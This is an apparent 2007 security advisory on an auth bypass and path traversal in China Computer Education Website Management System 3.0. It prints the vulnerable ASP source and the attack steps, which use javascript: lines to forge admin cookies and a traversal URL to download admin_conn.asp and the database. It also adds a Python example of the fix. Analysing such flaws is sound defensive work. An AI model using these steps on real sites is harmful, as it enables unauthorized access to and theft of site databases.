China Computer Education Website Management System 3.0 vulnerability analysis

ID MYHACK58:62200717681
Type myhack58
Reporter Anonymous
Modified 2007-11-21T00:00:00


/edit/downfile.asp contains the following code:

```asp
<!--#include file="fsoconfig.asp" -->
<!--#include file="checklogin.asp" -->
<%
' The "path" request parameter is passed to downloadFile unchanged.
call downloadFile(Request("path"))

function downloadFile(strFile)
    ' Server.MapPath resolves the caller-supplied name relative to this
    ' page's directory with no restriction on the target directory.
    strFilename = server.MapPath(strFile)
    Response.Buffer = True
    Response.Clear
    Set s = Server.CreateObject("ADODB.Stream")
    s.Open
    s.Type = 1
    on error resume next
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    if not fso.FileExists(strFilename) then
        Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
        Response.End
    end if
    Set f = fso.GetFile(strFilename)
    intFilelength = f.size
    s.LoadFromFile(strFilename)
    if err then
        Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
        Response.End
    end if
    ' The file is streamed back as an attachment regardless of its type.
    Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
    Response.AddHeader "Content-Length", intFilelength
    Response.CharSet = "UTF-8"
    Response.ContentType = "application/octet-stream"
    Response.BinaryWrite s.Read
    Response.Flush
    s.Close
    Set s = Nothing
End Function
%>
```

It defines a downloadFile function that streams whatever file the path parameter names back to the client. The included checklogin.asp is the page that checks whether the user is logged in; its source is as follows:

```asp
<%
' Cookie authentication: every value tested here is sent by the browser.
if Request.Cookies("admindj")<>"1" then
    Response.Write "<BR><BR><BR><BR><center>insufficient permissions, you do not have this feature administrative privileges"
    Response.end
end if

if Request.Cookies("adminuser")="" or Request.Cookies("adminpass")="" then
    Response.Write "<BR><BR><BR><BR><center>insufficient permissions, you do not have this feature administrative privileges."
    Response.end
end if
%>
```

The login check relies only on cookies, which the client controls. In the browser address bar, enter the following in turn:

```javascript
javascript:alert(document.cookie="admindj=1")
javascript:alert(document.cookie="adminuser=hackwolf")
javascript:alert(document.cookie="adminpass=fuckyou")
```

Then construct the URL directly:

> http://localhost:81/edit/downfile.asp?path=../admin_conn.asp

This downloads the admin_conn.asp page without trouble, and the database can be downloaded the same way. The login page is login.asp, and the admin backend has a Backup Database function; what follows from that is well known.
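As an added example that is not part of the original advisory or of the product's own code, the following Python sketches the two checks a fixed downfile.asp and checklogin.asp would need: the requested name is joined to one fixed download directory and must resolve strictly inside it, and the admin decision comes from a server-side session looked up by an opaque random token rather than from cookies the browser sets itself. DOWNLOAD_ROOT, resolve_download_path, SessionStore and handle_download are hypothetical names chosen for this example, and the root path is constructed.

```python
import os
import secrets
from typing import Dict, Optional, Tuple

# Hypothetical download root for the fixed handler: the single directory
# that user-supplied "path" values are allowed to name (constructed value).
DOWNLOAD_ROOT = "/wwwroot/edit/downloads"


def resolve_download_path(base_dir: str, requested: str) -> Optional[str]:
    """Map a user-supplied file name onto base_dir, or return None.

    The original downfile.asp hands Request("path") straight to
    Server.MapPath, so "../admin_conn.asp" resolves one level up.  Here the
    name is joined to a fixed root and the result must still lie inside it.
    Empty names, NUL bytes, absolute paths and drive-letter paths are
    rejected before normalisation.
    """
    if not requested or "\x00" in requested:
        return None
    # IIS treats both separators alike, so normalise before inspecting.
    name = requested.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return None
    base = os.path.normpath(os.path.abspath(base_dir))
    candidate = os.path.normpath(os.path.join(base, *name.split("/")))
    # Containment check: the resolved path must be strictly below base.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


class SessionStore:
    """Server-side session table keyed by an opaque random token.

    checklogin.asp trusts admindj/adminuser/adminpass cookies that the
    browser itself sets.  Here the browser only holds a random token; the
    privilege flag lives on the server, so a forged admindj=1 grants nothing.
    """

    def __init__(self) -> None:
        self._sessions: Dict[str, Dict[str, object]] = {}

    def login(self, username: str, is_admin: bool) -> str:
        """Called only after the password has been verified server-side."""
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": username, "admin": is_admin}
        return token

    def is_admin(self, cookies: Dict[str, str]) -> bool:
        entry = self._sessions.get(cookies.get("session", ""))
        return bool(entry and entry["admin"])


def handle_download(store: SessionStore, cookies: Dict[str, str],
                    requested: str) -> Tuple[str, Optional[str]]:
    """Decision logic of a hardened downfile.asp, as (status, path).

    A real handler would go on to check that the path exists and stream it;
    that part is omitted so the function runs offline.
    """
    if not store.is_admin(cookies):
        return ("forbidden", None)
    path = resolve_download_path(DOWNLOAD_ROOT, requested)
    if path is None:
        return ("bad_request", None)
    return ("ok", path)


if __name__ == "__main__":
    store = SessionStore()
    # Constructed cookies mirroring the advisory's client-side values.
    forged = {"admindj": "1", "adminuser": "hackwolf", "adminpass": "x"}
    print(handle_download(store, forged, "report.pdf"))          # forbidden
    token = store.login("admin", True)
    print(handle_download(store, {"session": token},
                          "../admin_conn.asp"))                  # bad_request
    print(handle_download(store, {"session": token}, "report.pdf"))  # ok
```

The containment test compares the normalised candidate against the root with os.path.commonpath rather than checking for a ".." substring, so encodings such as "sub/../../x" or a backslash variant are caught after normalisation instead of by pattern matching. The session token is the only thing the browser ever stores, and the handler never reads a privilege flag from a cookie.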

Full site download address: